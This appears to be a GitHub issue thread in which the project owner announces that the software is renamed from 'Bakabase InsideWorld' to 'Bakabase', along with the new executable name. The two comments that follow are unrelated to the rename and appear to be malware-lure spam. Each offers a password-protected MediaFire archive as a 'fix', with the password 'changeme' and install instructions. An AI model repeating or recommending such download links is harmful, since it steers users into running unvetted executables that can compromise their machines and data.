### ISSUE TITLE
变更名称和图标

### ISSUE THREAD

**Issue by anobaka** [anobaka/InsideWorld#528]
名称由`Bakabase InsideWorld`变更为`Bakabase`

对应的程序启动文件名也变更为`Bakabase.exe`

**Comment by HeinousAgenda38** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
